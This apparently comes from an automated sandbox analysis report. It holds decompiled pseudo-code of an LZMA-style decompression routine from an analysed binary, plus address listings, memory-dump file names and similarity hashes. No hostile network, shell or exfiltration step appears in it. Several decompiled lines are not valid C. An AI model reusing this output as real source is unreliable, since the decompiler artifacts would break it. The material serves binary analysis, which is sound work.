													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                        0x00000000
                        0x00406591
                        0x00406591
                        0x00406595
                        0x004065a2
                        0x004065ac
                        0x00000000
                        0x00406597
                        0x00406597
                        0x004065d2
                        0x004065d5
                        0x004065d8
                        0x004065db
                        0x004065db
                        0x004065de
                        0x004065e5
                        0x004065ea
                        0x004064cb
                        0x004064ce
                        0x00406840
                        0x00406840
                        0x00406840
                        0x00406843
                        0x00406843
                        0x00406843
                        0x00406849
                        0x0040684f
                        0x00406855
                        0x0040686f
                        0x00406872
                        0x00406878
                        0x00406883
                        0x00406885
                        0x00406857
                        0x00406857
                        0x00406866
                        0x0040686a
                        0x0040686a
                        0x0040688f
                        0x00000000
                        0x00000000
                        0x00406891
                        0x00406895
                        0x00406a44
                        0x00406a5a
                        0x00406a62
                        0x00406a69
                        0x00406a6b
                        0x00406a72
                        0x00406a76
                        0x00406a76
                        0x004068a1
                        0x004068a8
                        0x004068b0
                        0x004068b3
                        0x004068b6
                        0x004068b6
                        0x004068bc
                        0x004068bc
                        0x00406058
                        0x00406058
                        0x00406058
                        0x00406061
                        0x00000000
                        0x00000000
                        0x00406067
                        0x00000000
                        0x00406072
                        0x00000000
                        0x00000000
                        0x0040607b
                        0x0040607e
                        0x00406081
                        0x00406085
                        0x00000000
                        0x00000000
                        0x0040608b
                        0x0040608e
                        0x00406090
                        0x00406091
                        0x00406094
                        0x00406096
                        0x00406097
                        0x00406099
                        0x0040609c
                        0x004060a1
                        0x004060a6
                        0x004060af
                        0x004060c2
                        0x004060c5
                        0x004060d1
                        0x004060f9
                        0x004060fb
                        0x00406109
                        0x00406109
                        0x0040610d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004060fd
                        0x004060fd
                        0x00406100
                        0x00406101
                        0x00406101
                        0x00000000
                        0x004060fd
                        0x004060d7
                        0x004060dc
                        0x004060dc
                        0x004060e5
                        0x004060ed
                        0x004060f0
                        0x00000000
                        0x004060f6
                        0x004060f6
                        0x00000000
                        0x004060f6
                        0x00000000
                        0x00406113
                        0x00406113
                        0x00406117
                        0x004069c3
                        0x00000000
                        0x004069c3
                        0x00406120
                        0x00406130
                        0x00406133
                        0x00406136
                        0x00406136
                        0x00406136
                        0x00406139
                        0x0040613d
                        0x00000000
                        0x00000000
                        0x0040613f
                        0x00406145
                        0x0040616f
                        0x00406175
                        0x0040617c
                        0x00000000
                        0x0040617c
                        0x0040614b
                        0x0040614e
                        0x00406153
                        0x00406153
                        0x0040615e
                        0x00406166
                        0x00406169
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004061ae
                        0x004061b4
                        0x004061b7
                        0x004061c4
                        0x004061cc
                        0x00406840
                        0x00406840
                        0x00000000
                        0x00000000
                        0x00406183
                        0x00406183
                        0x00406187
                        0x004069d2
                        0x00000000
                        0x004069d2
                        0x00406193
                        0x0040619e
                        0x0040619e
                        0x0040619e
                        0x004061a1
                        0x004061a4
                        0x004061a7
                        0x004061ac
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406843
                        0x00406843
                        0x00406849
                        0x0040684f
                        0x00406855
                        0x0040686f
                        0x00406872
                        0x00406878
                        0x00406883
                        0x00406885
                        0x00406857
                        0x00406857
                        0x00406866
                        0x0040686a
                        0x0040686a
                        0x0040688f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004061d4
                        0x004061d6
                        0x004061d9
                        0x0040624a
                        0x0040624d
                        0x00406250
                        0x00406257
                        0x00406261
                        0x00406840
                        0x00406840
                        0x00406840
                        0x00000000
                        0x00406840
                        0x00406840
                        0x004061db
                        0x004061df
                        0x004061e2
                        0x004061e4
                        0x004061e7
                        0x004061ea
                        0x004061ec
                        0x004061ef
                        0x004061f1
                        0x004061f6
                        0x004061f9
                        0x004061fc
                        0x00406200
                        0x00406207
                        0x0040620a
                        0x00406211
                        0x00406215
                        0x0040621d
                        0x0040621d
                        0x0040621d
                        0x00406217
                        0x00406217
                        0x00406217
                        0x0040620c
                        0x0040620c
                        0x0040620c
                        0x00406221
                        0x00406224
                        0x00406242
                        0x00406244
                        0x00000000
                        0x00406226
                        0x00406226
                        0x00406229
                        0x0040622c
                        0x0040622f
                        0x00406231
                        0x00406231
                        0x00406231
                        0x00406234
                        0x00406237
                        0x00406239
                        0x0040623a
                        0x0040623d
                        0x00000000
                        0x0040623d
                        0x00000000
                        0x00406473
                        0x00406477
                        0x00406495
                        0x00406498
                        0x0040649f
                        0x004064a2
                        0x004064a5
                        0x004064a8
                        0x004064ab
                        0x004064ae
                        0x004064b0
                        0x004064b7
                        0x004064b8
                        0x004064ba
                        0x004064bd
                        0x004064c0
                        0x004064c3
                        0x004064c3
                        0x004064c8
                        0x00000000
                        0x004064c8
                        0x00406479
                        0x0040647c
                        0x0040647f
                        0x00406489
                        0x00406840
                        0x00406840
                        0x00406840
                        0x00000000
                        0x00406840
                        0x00000000
                        0x004064dd
                        0x004064e1
                        0x00406504
                        0x00406507
                        0x0040650a
                        0x00406514
                        0x004064e3
                        0x004064e3
                        0x004064e6
                        0x004064e9
                        0x004064ec
                        0x004064f9
                        0x004064fc
                        0x004064fc
                        0x00406840
                        0x00406840
                        0x00406840
                        0x00000000
                        0x00406840
                        0x00000000
                        0x00406520
                        0x00406524
                        0x00000000
                        0x00000000
                        0x0040652a
                        0x0040652e
                        0x00000000
                        0x00000000
                        0x00406534
                        0x00406536
                        0x0040653a
                        0x0040653a
                        0x0040653d
                        0x00406541
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004065b8
                        0x004065bc
                        0x004065c3
                        0x004065c6
                        0x004065c9
                        0x004065be
                        0x004065be
                        0x004065be
                        0x004065cc
                        0x004065cf
                        0x00000000
                        0x00000000
                        0x00406678
                        0x00406678
                        0x0040667c
                        0x00406a1a
                        0x00000000
                        0x00406a1a
                        0x00406682
                        0x00406685
                        0x00406688
                        0x0040668c
                        0x0040668f
                        0x00406695
                        0x00406697
                        0x00406697
                        0x00406697
                        0x0040669a
                        0x0040669d
                        0x00000000
                        0x00000000
                        0x0040626d
                        0x0040626d
                        0x00406271
                        0x004069de
                        0x00000000
                        0x004069de
                        0x00406277
                        0x0040627a
                        0x0040627d
                        0x00406281
                        0x00406284
                        0x0040628a
                        0x0040628c
                        0x0040628c
                        0x0040628c
                        0x0040628f
                        0x00406292
                        0x00406292
                        0x00406295
                        0x00406298
                        0x00000000
                        0x00000000
                        0x0040629e
                        0x004062a4
                        0x00000000
                        0x00000000
                        0x004062aa
                        0x004062aa
                        0x004062ae
                        0x004062b1
                        0x004062b4
                        0x004062b7
                        0x004062ba
                        0x004062bb
                        0x004062be
                        0x004062c0
                        0x004062c6
                        0x004062c9
                        0x004062cc
                        0x004062cf
                        0x004062d2
                        0x004062d5
                        0x004062d8
                        0x004062f4
                        0x004062f7
                        0x004062fa
                        0x004062fd
                        0x00406304
                        0x00406308
                        0x0040630a
                        0x0040630e
                        0x004062da
                        0x004062da
                        0x004062de
                        0x004062e6
                        0x004062eb
                        0x004062ed
                        0x004062ef
                        0x004062ef
                        0x00406311
                        0x00406318
                        0x0040631b
                        0x00000000
                        0x00406321
                        0x00000000
                        0x00406321
                        0x00000000
                        0x00406326
                        0x00406326
                        0x0040632a
                        0x004069ea
                        0x00000000
                        0x004069ea
                        0x00406330
                        0x00406333
                        0x00406336
                        0x0040633a
                        0x0040633d
                        0x00406343
                        0x00406345
                        0x00406345
                        0x00406345
                        0x00406348
                        0x0040634b
                        0x0040634b
                        0x0040634b
                        0x00406351
                        0x00000000
                        0x00000000
                        0x00406353
                        0x00406356
                        0x00406359
                        0x0040635c
                        0x0040635f
                        0x00406362
                        0x00406365
                        0x00406368
                        0x0040636b
                        0x0040636e
                        0x00406371
                        0x00406389
                        0x0040638c
                        0x0040638f
                        0x00406392
                        0x00406392
                        0x00406395
                        0x00406399
                        0x0040639b
                        0x00406373
                        0x00406373
                        0x0040637b
                        0x00406380
                        0x00406382
                        0x00406384
                        0x00406384
                        0x0040639e
                        0x004063a5
                        0x004063a8
                        0x00000000
                        0x004063aa
                        0x00000000
                        0x004063aa
                        0x004063a8
                        0x004063af
                        0x004063af
                        0x004063af
                        0x004063af
                        0x00000000
                        0x00000000
                        0x004063ea
                        0x004063ea
                        0x004063ee
                        0x004069f6
                        0x00000000
                        0x004069f6
                        0x004063f4
                        0x004063f7
                        0x004063fa
                        0x004063fe
                        0x00406401
                        0x00406407
                        0x00406409
                        0x00406409
                        0x00406409
                        0x0040640c
                        0x0040640f
                        0x0040640f
                        0x00406415
                        0x004063b3
                        0x004063b3
                        0x004063b6
                        0x00000000
                        0x004063b6
                        0x00406417
                        0x00406417
                        0x0040641a
                        0x0040641d
                        0x00406420
                        0x00406423
                        0x00406426
                        0x00406429
                        0x0040642c
                        0x0040642f
                        0x00406432
                        0x00406435
                        0x0040644d
                        0x00406450
                        0x00406453
                        0x00406456
                        0x00406456
                        0x00406459
                        0x0040645d
                        0x0040645f
                        0x00406437
                        0x00406437
                        0x0040643f
                        0x00406444
                        0x00406446
                        0x00406448
                        0x00406448
                        0x00406462
                        0x00406469
                        0x0040646c
                        0x00000000
                        0x0040646e
                        0x00000000
                        0x0040646e
                        0x00000000
                        0x004066fb
                        0x004066fb
                        0x004066ff
                        0x00406a26
                        0x00000000
                        0x00406a26
                        0x00406705
                        0x00406708
                        0x0040670b
                        0x0040670f
                        0x00406712
                        0x00406718
                        0x0040671a
                        0x0040671a
                        0x0040671a
                        0x0040671d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040680a
                        0x0040680e
                        0x00406830
                        0x00406833
                        0x0040683d
                        0x00406840
                        0x00406840
                        0x00406840
                        0x00000000
                        0x00406840
                        0x00406840
                        0x00406810
                        0x00406813
                        0x00406817
                        0x0040681a
                        0x0040681a
                        0x0040681d
                        0x00000000
                        0x00000000
                        0x004068c7
                        0x004068cb
                        0x004068e9
                        0x004068e9
                        0x004068e9
                        0x004068f0
                        0x004068f7
                        0x004068fe
                        0x004068fe
                        0x00000000
                        0x004068fe
                        0x004068cd
                        0x004068d0
                        0x004068d3
                        0x004068d6
                        0x004068dd
                        0x00406821
                        0x00406821
                        0x00406824
                        0x00000000
                        0x00000000
                        0x004069b8
                        0x004069bb
                        0x004068bc
                        0x00000000
                        0x00000000
                        0x004065f2
                        0x004065f4
                        0x004065fb
                        0x004065fc
                        0x004065fe
                        0x00406601
                        0x00000000
                        0x00000000
                        0x00406609
                        0x0040660c
                        0x0040660f
                        0x00406611
                        0x00406613
                        0x00406613
                        0x00406614
                        0x00406617
                        0x0040661e
                        0x00406621
                        0x0040662f
                        0x00000000
                        0x00000000
                        0x00406905
                        0x00406905
                        0x00406908
                        0x0040690f
                        0x00000000
                        0x00000000
                        0x00406914
                        0x00406914
                        0x00406918
                        0x00406a50
                        0x00000000
                        0x00406a50
                        0x0040691e
                        0x00406921
                        0x00406924
                        0x00406928
                        0x0040692b
                        0x00406931
                        0x00406933
                        0x00406933
                        0x00406933
                        0x00406936
                        0x00406939
                        0x00406939
                        0x00406939
                        0x00406939
                        0x0040693c
                        0x0040693c
                        0x00406940
                        0x004069a0
                        0x004069a3
                        0x004069a8
                        0x004069a9
                        0x004069ab
                        0x004069ad
                        0x004069b0
                        0x004068bc
                        0x004068bc
                        0x00000000
                        0x004068c2
                        0x004068bc
                        0x00406942
                        0x00406948
                        0x0040694b
                        0x0040694e
                        0x00406951
                        0x00406954
                        0x00406957
                        0x0040695a
                        0x0040695d
                        0x00406960
                        0x00406963
                        0x0040697c
                        0x0040697f
                        0x00406982
                        0x00406985
                        0x00406989
                        0x0040698b
                        0x0040698b
                        0x0040698c
                        0x0040698f
                        0x00406965
                        0x00406965
                        0x0040696d
                        0x00406972
                        0x00406974
                        0x00406977
                        0x00406977
                        0x00406992
                        0x00406999
                        0x00000000
                        0x0040699b
                        0x00000000
                        0x0040699b
                        0x00000000
                        0x00406637
                        0x0040663a
                        0x00406670
                        0x004067a0
                        0x004067a0
                        0x004067a0
                        0x004067a0
                        0x004067a3
                        0x004067a3
                        0x004067a6
                        0x004067a8
                        0x00406a32
                        0x00000000
                        0x00406a32
                        0x004067ae
                        0x004067b1
                        0x00000000
                        0x00000000
                        0x004067b7
                        0x004067bb
                        0x004067be
                        0x004067be
                        0x004067be
                        0x00000000
                        0x004067be
                        0x0040663c
                        0x0040663e
                        0x00406640
                        0x00406642
                        0x00406645
                        0x00406646
                        0x00406648
                        0x0040664a
                        0x0040664d
                        0x00406650
                        0x00406666
                        0x0040666b
                        0x004066a3
                        0x004066a3
                        0x004066a7
                        0x004066d3
                        0x004066d5
                        0x004066dc
                        0x004066df
                        0x004066e2
                        0x004066e2
                        0x004066e7
                        0x004066e7
                        0x004066e9
                        0x004066ec
                        0x004066f3
                        0x004066f6
                        0x00406723
                        0x00406723
                        0x00406726
                        0x00406729
                        0x0040679d
                        0x0040679d
                        0x0040679d
                        0x00000000
                        0x0040679d
                        0x0040672b
                        0x00406731
                        0x00406734
                        0x00406737
                        0x0040673a
                        0x0040673d
                        0x00406740
                        0x00406743
                        0x00406746
                        0x00406749
                        0x0040674c
                        0x00406765
                        0x00406767
                        0x0040676a
                        0x0040676b
                        0x0040676e
                        0x00406770
                        0x00406773
                        0x00406775
                        0x00406777
                        0x0040677a
                        0x0040677c
                        0x0040677f
                        0x00406783
                        0x00406785
                        0x00406785
                        0x00406786
                        0x00406789
                        0x0040678c
                        0x0040674e
                        0x0040674e
                        0x00406756
                        0x0040675b
                        0x0040675d
                        0x00406760
                        0x00406760
                        0x0040678f
                        0x00406796
                        0x00406720
                        0x00406720
                        0x00406720
                        0x00406720
                        0x00000000
                        0x00406798
                        0x00000000
                        0x00406798
                        0x00406796
                        0x004066a9
                        0x004066ac
                        0x004066ae
                        0x004066b1
                        0x004066b4
                        0x004066b7
                        0x004066b9
                        0x004066bc
                        0x004066bf
                        0x004066bf
                        0x004066c2
                        0x004066c2
                        0x004066c5
                        0x004066cc
                        0x004066a0
                        0x004066a0
                        0x004066a0
                        0x004066a0
                        0x00000000
                        0x004066ce
                        0x00000000
                        0x004066ce
                        0x004066cc
                        0x00406652
                        0x00406655
                        0x00406657
                        0x0040665a
                        0x00000000
                        0x00000000
                        0x004063b9
                        0x004063b9
                        0x004063bd
                        0x00406a02
                        0x00000000
                        0x00406a02
                        0x004063c3
                        0x004063c6
                        0x004063c9
                        0x004063cc
                        0x004063cf
                        0x004063d2
                        0x004063d5
                        0x004063d7
                        0x004063da
                        0x004063dd
                        0x004063e0
                        0x004063e2
                        0x004063e2
                        0x004063e2
                        0x00000000
                        0x00000000
                        0x00406544
                        0x00406544
                        0x00406548
                        0x00406a0e
                        0x00000000
                        0x00406a0e
                        0x0040654e
                        0x00406551
                        0x00406554
                        0x00406557
                        0x00406559
                        0x00406559
                        0x00406559
                        0x0040655c
                        0x0040655f
                        0x00406562
                        0x00406565
                        0x00406568
                        0x0040656b
                        0x0040656c
                        0x0040656e
                        0x0040656e
                        0x0040656e
                        0x00406571
                        0x00406574
                        0x00406577
                        0x0040657a
                        0x0040657a
                        0x0040657a
                        0x0040657d
                        0x0040657f
                        0x0040657f
                        0x00000000
                        0x00000000
                        0x004067c1
                        0x004067c1
                        0x004067c1
                        0x004067c5
                        0x00000000
                        0x00000000
                        0x004067cb
                        0x004067ce
                        0x004067d1
                        0x004067d4
                        0x004067d6
                        0x004067d6
                        0x004067d6
                        0x004067d9
                        0x004067dc
                        0x004067df
                        0x004067e2
                        0x004067e5
                        0x004067e8
                        0x004067e9
                        0x004067eb
                        0x004067eb
                        0x004067eb
                        0x004067ee
                        0x004067f1
                        0x004067f4
                        0x004067f7
                        0x004067fa
                        0x004067fe
                        0x00406800
                        0x00406803
                        0x00000000
                        0x00406805
                        0x00406582
                        0x00406582
                        0x00000000
                        0x00406582
                        0x00406803
                        0x00406a38
                        0x00000000
                        0x00000000
                        0x00406067
                        0x00406a6f
                        0x00406a6f
                        0x00000000
                        0x00406a6f
                        0x004068bc
                        0x00406843
                        0x00406840
                        0x00000000
                        0x00406595

                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                        • Instruction ID: c4674237f5282a099a09cde02a4657600336f9fef0cdfe8d994bfdecfa790225
                        • Opcode Fuzzy Hash: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                        • Instruction Fuzzy Hash: 4A714671E00228CFDF28DFA8C8547ADBBB1FB44301F15816AD916BB281C7785A96DF44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004064DD, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E004064DD() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
